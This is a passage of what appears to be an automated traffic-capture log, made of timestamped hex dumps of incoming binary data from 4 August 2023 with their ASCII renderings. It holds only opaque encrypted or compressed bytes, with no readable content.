                                                                                      2023-08-04 16:48:40 UTC2198INData Raw: 31 b6 9e c9 b8 38 94 9b bb 93 8b 8f c4 75 d0 20 8f de 40 fe ee 68 be 8f ae ec 0d 46 5a 3b 1f 95 4e 29 8e 32 68 64 51 38 a4 47 b7 83 c5 81 d8 eb 0d 1e 81 0b 6a 2d d5 f6 fb 31 56 d8 47 0e 35 8d d9 37 e7 74 cf 0a 90 58 08 4c c4 ab f4 c6 7d 5c 01 54 95 1e fd df d8 be 9a e8 28 69 0b 90 af 49 8d 4e 21 be 83 e4 da f5 d4 cc 65 1b e0 0a 41 e9 0a 59 a8 08 8a 2b 1a b3 93 4d 93 25 a5 d2 ab 01 96 ff d3 08 0d 8a 2e fc 5d d0 3b 1b 36 4b f3 5c 8f 86 20 ab 86 f7 de cf ec 28 fc 73 e3 c1 ae 36 04 4b 69 e7 4e 37 94 0d d5 57 1e fe 7e 0d 15 b0 6c 62 46 0c 13 61 3b 3b a2 30 e3 4e 46 ef aa 7b c4 a4 bb 77 68 a2 05 95 7a 4c c5 eb 5e bd 89 e5 99 dc ae a4 9f 21 58 4a e8 8c 67 0c f9 b7 3e 12 89 66 83 8e bc a1 84 90 51 92 4d 78 37 fc eb f4 07 fd cf c8 c1 0e 05 ff 56 43 79 a2 7c 30 8c
                                                                                      Data Ascii: 18u @hFZ;N)2hdQ8Gj-1VG57tXL}\T(iIN!eAY+M%.];6K\ (s6KiN7W~lbFa;;0NF{whzL^!XJg>fQMx7VCy|0
                                                                                      2023-08-04 16:48:40 UTC2202INData Raw: c1 22 79 2c fe 34 54 3e 02 12 de 26 9b 8b a3 0a c7 8b 66 a6 48 33 3c c9 9e 2f 50 86 ab d8 3f 19 a0 14 eb c7 24 e3 5b 99 54 a6 53 91 ab 55 e4 d0 70 9a 8d 6b e9 94 db 65 81 75 8c 96 a9 92 bf f5 eb 77 d2 3a 5a d4 92 65 10 52 77 a2 ff 5b 71 8b ac b2 00 94 86 60 5d e9 b5 98 4b 3e b1 f0 ac d3 4d 93 6b 02 e5 d4 7b 6a e5 01 15 87 d5 f0 36 15 16 5b 1c a3 f0 6c 0d 7e c6 ed 63 b0 5c 7b 79 bf 09 1f 65 31 11 4e 51 f2 a6 59 02 a1 69 ab de d1 94 8e 38 cd 17 f7 7b 4f 5f a0 73 f9 7e 47 48 d9 70 7d 45 bc 4e 9d 10 18 4f 80 0e ef 9b 2a 96 a7 8c 23 15 b6 c1 d5 60 5f 76 69 20 04 f5 71 a4 df 67 fa ab 77 f6 27 05 ff d8 ae 12 51 c6 c6 8e 0e 0d 67 f7 85 9b 86 b9 79 56 fd 3b 68 ad 72 64 17 e5 d1 72 55 5b 12 fb 3a 37 b1 ac 14 c3 c1 ef a3 dd 33 c9 89 3d ef d9 0b c7 c1 3e 5b c1 4a de
                                                                                      Data Ascii: "y,4T>&fH3</P?$[TSUpkeuw:ZeRw[q`]K>Mk{j6[l~c\{ye1NQYi8{O_s~GHp}ENO*#`_vi qgw'QgyV;hrdrU[:73=>[J
                                                                                      2023-08-04 16:48:40 UTC2206INData Raw: 2d cd 51 af 7c 47 36 60 c0 fb ed 8d 92 40 25 7d f0 85 9d 52 0a f8 42 ec 8f 15 06 cc 1a 5d 43 18 b3 82 bc b4 f8 a4 0e 56 e1 85 2f b3 7f 5d ca 62 7e 5f 0b 53 25 c9 9e 47 26 5f d0 c8 d8 29 49 93 04 45 9b 9c d5 78 66 31 cf e7 5b dd 91 ab 42 33 8f 88 3a d6 75 93 c8 96 32 ff 1a e9 6a 05 ee ab 00 19 a2 37 74 07 73 40 32 ef ad c1 98 b5 23 50 f6 24 18 09 3d 60 83 bd 91 44 dc 59 92 9b 1c a1 94 ff 2c c4 4c c1 25 e8 56 b2 e1 62 33 03 e3 88 62 d4 1f db 98 14 4a 39 ad ae 56 48 58 65 ae 77 fc 0a ec 3e e3 72 f8 f4 51 66 4f 9d 3b 9c 6b 69 21 e4 10 17 2d 51 0f 3f 66 d3 56 36 e7 b9 81 72 39 53 a0 a7 4f 4b 6c b8 87 a7 fa 2e ab f5 f1 b5 c3 30 a8 be 52 5b 25 3f e0 7c 58 66 f0 b4 10 c7 50 6f f3 f9 cc d7 b5 ac b7 2f 9f 76 0e 2b 16 dc f1 cf dc 7d 53 c8 25 fd f3 cf ac 04 b7 8f 58
                                                                                      Data Ascii: -Q|G6`@%}RB]CV/]b~_S%G&_)IExf1[B3:u2j7ts@2#P$=`DY,L%Vb3bJ9VHXew>rQfO;ki!-Q?fV6r9SOKl.0R[%?|XfPo/v+}S%X
                                                                                      2023-08-04 16:48:40 UTC2210INData Raw: dc 44 41 e5 37 a5 5f 84 71 1e 74 29 44 29 aa 3f 51 ef d7 76 93 b6 38 65 48 91 c7 78 c3 04 27 04 ce b4 29 18 de 63 02 ec 71 ef d3 7e 19 8a 02 15 3f 8e 8f 79 cf c6 6d ba 35 0b e5 66 ec cd de cf 46 23 16 8d b5 8a ae 8e 1b 9f 27 c7 01 4d fb 5f 79 e0 bb 8e d6 61 5d b1 80 8a f4 20 c2 fc f1 9e 2a a2 10 2b cd 0e 67 26 99 b3 65 c5 77 dc 8a 58 23 78 ba 62 d6 e7 7a 43 d4 a6 35 5c 8b ff b9 21 9c 1b fb bb f3 d1 4c 7b 05 47 31 12 75 20 f5 02 b7 c2 3e 12 de 94 41 43 a2 ee df da 12 95 10 fc 93 b4 36 dd 68 2c a4 f5 58 85 06 9f 2b 87 69 f5 e7 65 7b 6b 65 19 19 90 fa 92 57 69 82 aa c1 bb dd 2b 4d 3b 8f 6f c0 b4 aa 40 3f fa e6 dc e7 5b 11 4e c7 b9 2e 82 fd 8f 9a 49 b7 8f 70 ed 61 bd df 43 a8 0f d9 40 8d 74 62 51 95 e4 3a 05 ef 57 f1 f8 49 3e 50 28 1c 6e 05 a6 a7 57 44 e7 68
                                                                                      Data Ascii: DA7_qt)D)?Qv8eHx')cq~?ym5fF#'M_ya] *+g&ewX#xbzC5\!L{G1u >AC6h,X+ie{keWi+M;o@?[N.IpaC@tbQ:WI>P(nWDh
                                                                                      2023-08-04 16:48:40 UTC2214INData Raw: 57 60 24 6c ff d0 b2 44 26 06 22 1e 76 dc c0 ef 91 af a8 cc 90 ec ca 5e cf 6c 73 d3 2a 31 cc c2 5c 10 51 48 66 3b e8 01 75 e6 2f 07 d7 88 02 e3 0a 11 c9 30 20 48 b7 8a 3f bc ff 96 40 d1 c1 c6 06 e7 17 f3 bf f4 a2 78 a7 f7 ec 22 8d 57 12 15 73 ee 0d fc 80 83 a4 f8 60 ee 01 8f fa 39 07 f5 7d 22 c7 d4 6c 82 93 78 00 f2 28 e8 e9 14 7a 23 1d c3 0f 8d 2e aa 72 33 c5 14 12 a1 6f 5e df 05 e6 ae fc 95 45 88 84 96 9f 4a 1a 77 2b 4b 52 b0 db a7 20 cd 78 00 02 d6 2c a0 5c 5b 34 e1 8a f3 b6 e7 7e b4 bd 49 3e 05 d2 c7 62 2e 67 95 6f 1f 46 92 6a e7 dc a8 61 12 3c 5f b2 b2 ca a5 b3 05 cb c4 74 fa 41 d8 b9 9e b1 93 b4 0f 60 5c 1f 3e 5f 78 ae 4f f5 4e 5f 91 c8 b4 5f 0a 2f fb ff 0e ad c5 a4 74 11 b8 eb c2 c5 76 96 41 59 2b 73 d3 d1 56 5e 2d 64 9d f8 87 cf 72 31 da be 3b 88
                                                                                      Data Ascii: W`$lD&"v^ls*1\QHf;u/0 H?@x"Ws`9}"lx(z#.r3o^EJw+KR x,\[4~I>b.goFja<_tA`\>_xON__/tvAY+sV^-dr1;
                                                                                      2023-08-04 16:48:40 UTC2218INData Raw: 02 31 35 f7 f8 49 6f e7 55 18 ed d7 af 2c 1c d9 87 92 07 d0 86 4e 31 11 4a af 33 c1 16 d9 6f 10 3c c1 b6 9e 4f ae 36 e8 b7 06 08 f9 57 e5 e8 0d b9 dd 4a 25 b7 78 c2 01 bb 31 b5 d5 07 00 61 80 ff 0b c2 f6 f6 48 a2 67 3b ef bd 47 3a 42 82 21 2a 7f cb 8d fa 4b 76 76 e5 36 fd 28 77 81 fa 02 91 e0 f0 96 89 fe 67 48 f7 75 ea d0 5a 06 cc 9c 56 18 09 47 a7 9c 8f 32 c1 ad a4 44 d5 d3 8c 05 1a d6 5f d3 6c ba 0f ac 06 b7 c3 dd 90 b7 39 d1 7e 39 bb 48 6a c8 d2 9c d8 7f d4 9a 8e d4 90 d0 1f 36 a8 11 9c a4 68 bc c8 51 69 30 ca 1c 73 44 ed d9 6b 96 6a 08 e3 0e b7 e4 d0 ef ea 49 b3 19 41 95 d4 0a c2 37 94 ac f3 20 ad ac ff d0 6b dc 41 39 cf e9 a6 df d6 e2 6f 9d 01 06 00 41 f5 b4 c7 11 aa 8e 6e f9 33 60 d4 7c 4b e1 c4 5d 42 4e 60 5f 5e 50 2a 95 df bb 3f fb 38 1b 77 6b 90
                                                                                      Data Ascii: 15IoU,N1J3o<O6WJ%x1aHg;G:B!*Kvv6(wgHuZVG2D_l9~9Hj6hQi0sDkjIA7 kA9oAn3`|K]BN`_^P*?8wk
                                                                                      2023-08-04 16:48:40 UTC2222INData Raw: af e1 5b 98 e8 89 fb d3 94 8b 04 e8 a7 0e 4c e9 72 a0 ec 41 13 bb e2 39 92 67 9b d8 3d 57 10 cd 41 92 76 62 23 f8 cc d6 e2 9c 88 bc d6 f5 1a aa fc 03 29 bd 17 c3 1d 5f 93 03 79 a1 84 24 c5 17 fc ca 4c 37 99 39 dd 50 63 39 2a ba f4 6f b2 83 56 e4 9b b0 97 28 f0 70 55 2b 73 c1 20 e5 54 05 5b 6a ef d7 99 6e 61 b2 9d b0 b2 1c 4c f1 db b0 ec b6 fd d0 2a 93 39 09 a1 17 fb 18 67 eb 16 ec a8 17 bf 37 9a 98 7b 64 49 44 91 e1 1f 2c ba 6b 8e a1 af 7c 5c 8f fc b4 a1 4b f0 25 43 5c de 34 50 dc 63 dd 69 b9 99 7d c2 0c 79 06 61 c3 88 37 04 a9 ff 3b e0 da f7 8c 7d a5 79 92 0d ac 11 ff f9 ab 14 b5 b0 a6 1d 69 8b 03 4c d6 c7 b2 0e 43 e9 68 ab cb 7f f9 00 07 9b 62 16 2c 48 15 38 b3 48 15 14 5f a6 0b 45 a9 07 c9 85 43 ec 7c ee 34 9e cb c1 67 57 7e 3f 54 1f e4 9f 0f cb df d8
                                                                                      Data Ascii: [LrA9g=WAvb#)_y$L79Pc9*oV(pU+s T[jnaL*9g7{dID,k|\K%C\4Pci}ya7;}yiLChb,H8H_EC|4gW~?T
                                                                                      2023-08-04 16:48:40 UTC2226INData Raw: eb e1 71 30 8f 05 cd 27 5b d3 54 99 19 00 1f 1f ea ce f3 6b af 96 17 1a 31 15 38 fa 9f 79 01 0c 8d 98 c9 3f 51 f3 90 12 0a d7 a5 d5 19 9d 55 74 91 f0 9b 90 bb b5 5d ac ce 95 45 8c 1a fe 4e 94 91 3b f0 52 62 19 7e aa b3 7c 53 1f ae 82 9a 86 ad 34 dd 0e ea 2e c7 e2 ee 57 0f c2 9d 7f 5e 0b 52 0f 8c 66 8e e8 af ab 2f f2 3c d9 82 20 23 5d af 93 c3 29 0e 00 53 6a e8 ff b5 7c 3b b3 cb fb 87 95 64 b5 ee 03 55 b6 3c b3 17 56 b1 6e 07 d1 c5 a0 9a 0a 75 65 5e d6 d8 75 f0 87 12 53 e2 29 c5 4a 85 82 de f5 cc eb 48 e8 0f 59 59 95 a3 11 99 f5 03 2e da d3 f0 53 85 42 38 a4 94 47 81 84 e2 c5 4e 27 58 7d a0 7f ec 5b b4 26 34 17 8b ea af 39 65 19 2d b8 93 45 23 c7 21 3a 56 c1 57 4b fd 1e 09 79 2d 33 23 a5 fa be e8 48 b1 c0 6b 66 29 b1 ec 1e 23 42 f4 cb b8 1f 96 0f a4 e6 b3
                                                                                      Data Ascii: q0'[Tk18y?QUt]EN;Rb~|S4.W^Rf/< #])Sj|;dU<Vnue^uS)JHYY.SB8GN'X}[&49e-E#!:VWKy-3#Hkf)#B
                                                                                      2023-08-04 16:48:40 UTC2230INData Raw: 06 c5 2f ff ad b9 8e a7 35 b4 e7 a8 dd 6f ca 69 ad 9b 75 4c 93 a2 0d f0 a1 99 a2 f5 7f 2d 37 9c 48 64 7c 86 b7 d0 6e 72 8b fe b7 ce 0e 17 c4 8e 59 55 8a 25 15 f1 5b ed 6e 3b c2 79 e8 32 6c be 26 9d 9f 04 aa a6 6a ff 82 cf 89 c2 2e 88 e6 62 0f 56 79 cc cc 2e b0 4e 22 d0 0c 95 22 c9 37 51 a3 52 9d 1f 6d 03 ad 76 e9 6d d2 f6 e6 00 ab 93 60 54 05 9b 23 af cc 68 21 ea 4b 33 9d 7e cd 63 4b d3 93 84 b0 c2 6f 96 44 cd f2 76 52 b6 40 a0 9f 0b e5 34 f6 58 92 c2 b9 0b 7a 4c 59 86 73 0f e5 74 78 4e 0a 13 ae 1a fc 0b cd db 7c 32 8c de 6a 13 ab b2 9d 0a e6 58 2e e9 c6 d3 58 1e 47 93 ae 78 1f eb e5 2e d1 2c 98 a9 55 93 f7 0a 1e dd f0 e9 4b 4b 58 a2 aa 59 ca a4 e2 3b 17 4f 73 d8 d7 6f c3 c1 e5 c2 0c 69 52 7d 82 66 f7 2c 33 8b 1d 69 a9 1e c4 5c 42 be fb ef 7b 94 90 c0 f3
                                                                                      Data Ascii: /5oiuL-7Hd|nrYU%[n;y2l&j.bVy.N""7QRmvm`T#h!K3~cKoDvR@4XzLYstxN|2jX.XGx.,UKKXY;OsoiR}f,3i\B{
                                                                                      2023-08-04 16:48:40 UTC2234INData Raw: c4 db 5e ed 1d c2 89 9a 9a d8 0c a6 0f ee f3 4b 2f b6 53 22 03 15 71 de 22 93 c6 ad 74 2a 74 a3 3d 93 e9 8c 5c ed 36 8b 55 8c 1a 26 01 39 b9 9e 5d f7 69 2d ed 8c 45 8d 9c 3a cf 12 51 a4 18 7a 4a 23 ce 08 ff 03 1f dc 45 2c 30 5f 86 41 71 d0 e4 a5 17 9f fa fa 8b d2 1b b9 87 cb 6a b2 fb 29 38 00 92 b5 47 64 f1 94 00 27 7e 85 96 fb ff ef 35 df f6 e3 83 0b d0 c7 18 14 f1 40 ff 76 df bc 09 80 22 f5 e7 bf db ac 5a 0b c1 32 67 64 da 24 70 b2 f1 cf c7 ad 32 a0 94 4d a6 f4 fa 38 5d 1c 81 1e 3d 92 a0 6d 23 c7 43 e1 3a 2d e8 5b d1 e7 ed 2b bb 38 f5 b0 0e 78 1c d5 cc c4 c4 d8 9f d0 05 93 ce 50 cb 88 41 2c e5 dd 20 04 f6 33 d9 59 34 c7 11 f1 0b 3f a9 d6 37 58 11 8e a9 b9 90 28 92 54 e6 8c 9a 65 69 a7 f7 34 59 d9 ae 18 01 f5 7c b4 b6 1c 92 8c a9 48 12 e1 38 07 7f 40 20
                                                                                      Data Ascii: ^K/S"q"t*t=\6U&9]i-E:QzJ#E,0_Aqj)8Gd'~5@v"Z2gd$p2M8]=m#C:-[+8xPA, 3Y4?7X(Tei4Y|H8@
                                                                                      2023-08-04 16:48:40 UTC2238INData Raw: 58 c5 19 1d 46 b7 4d 0c 87 ff 20 4e ae 67 9a ab 90 ca b8 27 96 5b eb 1c f1 c1 13 f5 c8 b3 8b fc 98 f8 a9 d2 19 6e 6d f2 67 90 cd ca ed 61 a5 6b f4 7b e5 b6 c9 54 dc ca ce 00 f8 50 f1 8a 4a 4e c3 82 60 fa f3 7c 0b b1 1f 9a 74 12 a6 7e eb 5c d5 56 a6 1f 83 a0 03 ae d8 69 e9 07 92 6f 87 6c 2e 99 c1 7e dc dc b2 a4 f0 ab fc 92 c9 da 72 98 64 aa 8b 9f 23 4e b5 72 bd f7 8a c6 47 79 e3 a2 ee 8b 18 a0 eb 52 51 69 51 9d 48 92 41 67 80 8b 5a 2d b1 7c f3 c2 04 dd 09 d4 8d 45 6c 5f ae 1c a8 4c 90 c8 e3 17 70 a5 ba 10 42 66 de 19 42 c2 89 03 24 94 01 40 cc 75 3d 45 fe ce b7 ff e7 45 e8 ab 85 8b 20 26 24 01 b1 83 78 82 79 5a d5 d7 08 f8 c4 52 16 73 00 f5 e4 e8 a7 7d fd ef a0 00 84 25 ce 8f 4d ff 4e 3f ef 4d 69 7f 55 ae fb a3 10 a8 3c 02 e3 3f fb 4f ab 51 42 6d c4 49 ad
                                                                                      Data Ascii: XFM Ng'[nmgak{TPJN`|t~\Viol.~rd#NrGyRQiQHAgZ-|El_LpBfB$@u=EE &$xyZRs}%MN?MiU<?OQBmI
                                                                                      2023-08-04 16:48:40 UTC2242INData Raw: b9 2a a6 a7 ad 0c 25 d8 a8 97 66 1a 88 54 cd 1f c3 f2 bc ed f1 2b d5 54 f2 11 bd 6d 65 35 bd f8 14 3c 28 82 7c 0b 55 bc 49 b8 65 5d b3 3d 01 7b 15 ef 39 76 3a fa 57 87 5e aa b0 e1 74 c7 e3 de fe 54 8a 9b 17 01 ce c4 87 88 0a 0c 4f 5b 54 ce e4 a1 43 f3 33 e0 c7 ce 49 85 20 dd 5b df 88 26 b6 e7 e8 7f b6 ad 94 f3 2a 36 16 c6 a1 9c 64 1a f1 32 48 88 1c 1b b6 04 08 42 33 62 59 87 cc 21 56 30 06 4e 23 a7 b0 a6 83 e3 66 96 19 21 9a b7 2a f5 26 14 da e9 da b9 81 49 39 44 5e 0e 7b 0e 4e f2 4f c4 9a f0 ed c2 6f ea d1 f9 13 3f c6 ce 8a 55 ce 06 8c f7 8a 6b 29 00 0d ba 0a bf 07 f7 f1 21 6e 75 1d cb b0 8a 29 ce ba c0 6f dd 24 71 db e9 8e ee 2d aa c9 36 57 fd c4 f4 e3 3c 95 e7 e6 63 1e 84 11 25 96 b8 e5 ed 3d c9 97 c6 d6 4a 36 60 61 63 46 73 39 86 00 8b 66 6d db 79 8a
                                                                                      Data Ascii: *%fT+Tme5<(|UIe]={9v:W^tTO[TC3I [&*6d2HB3bY!V0N#f!*&I9D^{NOo?Uk)!nu)o$q-6W<c%=J6`acFs9fmy
                                                                                      2023-08-04 16:48:40 UTC2246INData Raw: b2 82 16 cd 79 ea 95 17 79 86 84 ab bb 68 db a9 09 83 b3 54 1a 3b d2 00 e1 f4 0f 5d 6b 42 2e 4f 89 6a 3a 2d 75 a2 0d fe eb f5 17 21 ca f3 96 37 54 b1 cd c7 58 7b e0 5e c6 d3 e5 7a 23 32 71 ac 4b 19 8d 7b 66 5e 74 b8 0b d0 2e a1 fe cd 8a 04 18 0f 36 83 0f e8 fe 88 55 3e 6e a8 d8 76 2e 47 e3 56 8b 56 ab 33 91 b7 97 aa 46 f9 c4 91 7d 77 63 b0 5f 6a 27 bc 77 3f c0 c2 8b 00 79 fd e1 50 44 1d 26 76 48 72 87 d2 7c 0c c5 28 24 e2 8f f6 7c b8 9a 03 22 bd 99 9b d8 88 e5 c7 f3 e0 17 e8 a5 d5 c0 21 b7 db c5 ad 84 83 d0 73 cf 5b 05 0e 72 7f a2 4b 36 cf e6 5a 4e 5e e5 04 86 19 5a 56 a4 e5 3f 16 66 47 23 d2 f5 e9 10 65 d6 19 a8 cc 3e ba 31 fd 0f 11 35 22 21 c5 1f 29 64 be 29 74 66 1f 16 24 1f fd 30 5a 47 9e 11 78 2d 39 9d 78 19 44 d5 8e b0 4f d7 82 9f fa b4 a3 91 36 bc
                                                                                      Data Ascii: yyhT;]kB.Oj:-u!7TX{^z#2qK{f^t.6U>nv.GVV3F}wc_j'w?yPD&vHr|($|"!s[rK6ZN^ZV?fG#e>15"!)d)tf$0ZGx-9xDO6
                                                                                      2023-08-04 16:48:40 UTC2250INData Raw: e8 df 1b 4d 93 51 ff f0 78 6d f3 bd 66 5c aa a6 06 2d 59 c1 1b 2f e0 3d 88 9e 6d fd 6a e3 a8 b4 e8 e0 fb 2a 3e 02 aa 58 1d 62 88 bb c3 18 7d 71 8a 4e a6 44 d8 2f b2 57 54 49 c6 4e 28 a1 c4 43 07 d8 29 83 88 3d 17 de 08 20 4c 51 fc 9c dc 32 0a 2f 14 d0 11 45 ea 84 2e 27 06 3b 90 11 58 e8 53 a8 e3 fc 72 2d 99 f9 aa 8a 2d b1 63 27 cf 47 94 f5 ca f1 f4 54 1b df d3 b2 40 94 64 e7 10 4e 96 65 fd 03 6b 85 93 c7 ee e2 f4 6e 5d 35 1a 0e 6f 38 48 c6 7c c1 be 83 75 49 99 b7 38 9d 85 86 54 89 af 5b f0 11 ac ac 02 20 86 94 78 aa 10 54 33 00 f4 02 fb 8f 6d e4 86 2b 4e 9d 41 88 ca 8b 0c d4 80 d6 7e 4f 73 62 30 10 3e fb 8b 3f d7 19 11 d9 d7 aa cd e9 77 07 06 95 ff 44 b9 95 6b f0 1c 93 8f bd c8 a7 3b d7 3a bd 73 f3 17 a9 74 a2 62 a3 21 2d b0 f3 ec e2 b5 48 a1 88 f3 30 b3
                                                                                      Data Ascii: MQxmf\-Y/=mj*>Xb}qND/WTIN(C)= LQ2/E.';XSr--c'GT@dNekn]5o8H|uI8T[ xT3m+NA~Osb0>?wDk;:stb!-H0
                                                                                      2023-08-04 16:48:40 UTC2254INData Raw: 35 eb 72 21 f4 c6 db fa 57 8a 7e c7 73 ca 59 b7 09 c8 1e 35 f8 c4 07 85 46 e8 f1 ae 7b 4e 05 91 e0 62 67 54 50 c3 24 55 72 87 40 62 39 56 2b 4a ca b9 68 70 6c 33 71 ef a8 e2 c0 a2 18 1c 5a 22 af e8 b0 58 0d 5d 7b 5d 20 5c f4 86 bb 7d 53 6b 42 3b a8 b0 bc 92 f9 8c d1 fc f6 36 15 33 9d ab 39 bf 2b 78 72 94 c4 f4 2a 2c cf 9d 64 7b 5b ca 91 76 a5 50 6e 4d 4b 56 00 08 3c 2f cb e0 fc 96 88 49 e5 64 20 2c 45 24 3e d3 20 2e 34 db c0 89 45 99 39 e6 5b 82 87 cd 58 8a 95 5b ba e3 03 aa 92 48 d7 5d ca 15 ae eb 19 07 f0 62 3f ac 3c 0f 8c 7b ee 16 53 0d 9d 72 fb b0 3a ea 42 57 5f 34 35 81 c5 51 18 7f 4c a1 af a1 6f 58 5f 9e 1e 2f 01 d1 94 47 c6 2a 03 21 c3 cb ed 68 5f 6f 53 e3 0b b9 79 d5 cc e6 d2 b8 c5 78 5d b8 d2 a1 51 21 9b 85 25 bc 2f 22 a1 1b 36 94 90 7a 25 93 e3
                                                                                      Data Ascii: 5r!W~sY5F{NbgTP$Ur@b9V+Jhpl3qZ"X]{] \}SkB;639+xr*,d{[vPnMKV</Id ,E$> .4E9[X[H]b?<{Sr:BW_45QLoX_/G*!h_oSyx]Q!%/"6z%
                                                                                      2023-08-04 16:48:40 UTC2258INData Raw: 61 ff 20 4e 67 1a 47 ce 1a d7 41 b3 92 ee b6 68 20 56 16 7c 6f 71 4b 5b 15 48 a0 26 17 81 0e 4b 0e a4 3e ae b7 17 37 09 30 9f 23 ed b6 ec b3 89 48 ba dc c4 ec e0 7f de 92 ba 4a 9e b9 42 d7 ba b3 b5 cd 46 ef ea b9 c5 eb b9 f4 b5 82 08 0b e2 e4 ec 50 17 78 16 9a 01 d1 06 46 c9 ba 24 97 e4 9a bb 72 a5 3e 8a cb 66 67 93 0b b9 6b 9e 01 80 47 6b 3f 07 86 07 44 66 2c 4b 97 49 3c 43 bc a6 6e f6 f9 94 f5 1c 31 da eb d7 5f c9 eb 39 19 20 e5 1c f7 35 b8 19 f3 29 ac 65 13 eb db 80 dd 3e 91 aa 52 d2 fa 83 bd d5 4a f6 2a 69 83 c3 b9 f2 ea f0 64 cc bc c8 0b e0 8a 9c fa d8 b0 5b 8b 58 76 6f 77 80 ac e4 4d a4 40 22 f0 b1 8e be 28 06 93 7c 2a b4 1d 55 39 bc c8 4a 18 ee 6a 92 45 3a f9 c2 95 14 aa 66 11 7c 81 08 c4 12 6f cd 96 87 29 9e 16 cc fc 8f 5e a5 19 51 62 22 37 fb a7
                                                                                      Data Ascii: a NgGAh V|oqK[H&K>70#HJBFPxF$r>fgkGk?Df,KI<Cn1_9 5)e>RJ*id[XvowM@"(|*U9JjE:f|o)^Qb"7
                                                                                      2023-08-04 16:48:40 UTC2262INData Raw: 1b 57 3c ed b7 b1 6c da 88 ce 9e 8d 7d 03 9c c8 e1 fc d3 ad 38 e4 8c 6c 93 98 cf d2 4d 21 99 93 98 1e 05 57 7f 8a 6e 5b 86 3c d2 7d c3 5d 18 5f c7 b3 f2 66 24 1b 2a 58 3b 7b e3 ad 3a 04 49 c7 f1 43 a9 a9 63 32 b2 9e 10 7c 8d c5 6e 6b 1e 50 cc 48 fa 39 1f 11 01 50 15 d8 58 a9 8b 60 ba e3 2e 5c d0 9d 74 9f 37 f1 58 51 b5 73 49 18 c5 a2 ec d5 08 bd a1 ef ba 9a fc f3 17 14 2b 34 07 85 62 c4 3f 33 76 a6 8e 81 af 27 25 f9 b8 e2 28 72 9e 3c 37 c6 b8 79 06 c8 cd 34 6b bc e0 51 0a 69 6b 91 9c 54 c3 c4 83 e8 9a 2b fa 4e 8c 82 11 1f e9 20 a2 54 b1 1d 2d 83 f8 86 7f f4 93 7c dd 01 11 b9 6c ff 65 2a f4 51 a4 63 35 5b 65 61 da 41 d0 56 21 f1 bb 1b 36 9d 48 31 c5 46 e6 cc ef 40 d3 3f fe 7a 0f bc c4 0c 47 96 1a 30 af 0b fe 74 99 ff dc f0 6c 6f d2 17 c4 a2 e9 11 49 8e a6
                                                                                      Data Ascii: W<l}8lM!Wn[<}]_f$*X;{:ICc2|nkPH9PX`.\t7XQsI+4b?3v'%(r<7y4kQikT+N T-|le*Qc5[eaAV!6H1F@?zG0tloI
                                                                                      2023-08-04 16:48:40 UTC2266INData Raw: 74 41 d0 21 61 ea 71 0a 22 95 1e 85 0d 94 c8 59 ce 72 dc 96 ec a3 05 2c 59 5a 2c b9 ba a3 60 77 71 1b 92 6a 08 1f 0a b9 04 ba 71 72 98 52 77 b3 83 e7 3c 1a 33 59 a8 0e 55 8e 0d b4 da f9 ec 17 a1 9e 30 99 4e 01 23 27 9d e2 39 14 66 5c a6 33 e4 f5 e7 67 93 01 1e e2 05 b6 59 ec 3f ec b4 b2 39 1a 61 a8 20 37 23 58 2b dc 33 13 d3 d0 ff ba fd 4b 5e 26 95 95 2f a5 73 35 90 b2 fc 7b 0d d8 1e cd 69 9f 02 e6 45 ac 91 e9 ec 20 13 8e 89 18 65 51 d4 7a 3d a1 5d 16 fd cc 7b 51 60 d2 2f 33 c9 a5 fc 60 de 30 71 d7 6c 31 49 2b 98 5a 15 31 de ef 2b fe a0 c4 74 13 3a 2f a3 41 39 58 a1 3c 8a 5c 42 72 b0 a3 e3 bc c4 88 f0 fd 12 db 00 f7 36 7d ac 5e 24 87 24 ef 08 14 46 ff ed e8 19 5e 5a c8 e4 2a e6 0d 3d c3 96 4f 31 a1 02 db e4 d2 1d 84 e1 5b 63 c3 8d 36 f1 49 00 21 c2 69 e5
                                                                                      Data Ascii: tA!aq"Yr,YZ,`wqjqrRw<3YU0N#'9f\3gY?9a 7#X+3K^&/s5{iE eQz=]{Q`/3`0ql1I+Z1+t:/A9X<\Br6}^$$F^Z*=O1[c6I!i
                                                                                      2023-08-04 16:48:40 UTC2270INData Raw: 0d f1 1c ae 8b 8e 2b c6 d0 9b 75 f0 db 7b 42 b3 2a 2f f0 76 46 03 6b 4c b3 18 01 a8 90 b2 61 fb 60 8c 50 61 33 9d b1 dd 00 84 e7 20 c9 e9 04 b1 91 9e ee 36 2e 87 27 9b 8f b9 d6 93 1a 9a 0c 39 c6 22 1b 2c a3 8f a9 4b 13 5c 8b ac 0f 93 6e c0 8c 51 0e 95 a6 77 78 79 d4 a7 b1 ee a2 98 5f c4 23 6e c9 6d c3 11 b2 62 41 b4 00 f1 e0 d5 02 8d 40 a2 34 d0 d3 3b e6 08 1e fa 0e 01 1c b2 1a 73 79 f1 6b 2a 34 70 e4 8b 01 b1 16 5b c9 82 5f 22 84 fa 8e 71 e3 dc 86 6c 82 b3 eb b7 a2 29 e0 f4 21 31 e3 ab 9c 3c b8 92 2c da 9d a8 b5 3c f9 c5 78 6c 01 5a c3 5b 55 66 5b a2 51 f4 b7 5c 94 5e e1 3d 52 4e c1 50 c6 f6 66 cf 02 ec f6 f4 bc ee c4 31 bc be 5f 19 4a d0 f5 be 85 0b 43 90 70 8c 78 27 ad 21 53 cd ed 64 e1 6c 7a b4 f8 e2 68 cf 5c 47 55 55 c9 86 61 08 39 84 8d 7f 9c 89 bd
                                                                                      Data Ascii: +u{B*/vFkLa`Pa3 6.'9",K\nQwxy_#nmbA@4;syk*4p[_"ql)!1<,<xlZ[Uf[Q\^=RNPf1_JCpx'!Sdlzh\GUUa9
                                                                                      2023-08-04 16:48:40 UTC2274INData Raw: 94 b5 fa 5a 07 2f 78 29 3c 94 fd 1c 6d 2a fd 3f dc 44 db 5f f8 aa ac 06 51 ee 29 6a 04 bf 6a a1 76 7f 57 7c 2f 88 9b bd bf ff d9 89 85 29 a0 71 5d 47 83 89 1d d8 4a 6a 19 03 25 63 49 a7 28 e3 5f bd df 17 89 ef f8 1f eb 7c 2f 87 a7 03 4a 1a d2 cc 72 5f da 78 a2 30 ab 58 a8 74 8c 50 39 c3 d2 2f 9f b1 46 c0 4f e8 e4 78 e3 94 df 48 b3 d5 8d 3f ae d7 ed 5e 63 9c 5c 58 fd 75 a8 a4 6c 51 9b c5 07 26 5d 5f 2e 62 50 a7 9f eb 1c 54 d8 f5 8d 57 2e 9c 77 ad 8c 12 57 58 24 1a 0a 62 91 2d 30 d9 cc 11 e8 75 f7 88 0d 32 d1 ae 3d 2c 4b 73 c1 66 82 ec 6d df 63 17 4d a0 29 81 6e db 0f c0 67 d2 5a b2 52 c1 51 a4 d7 46 59 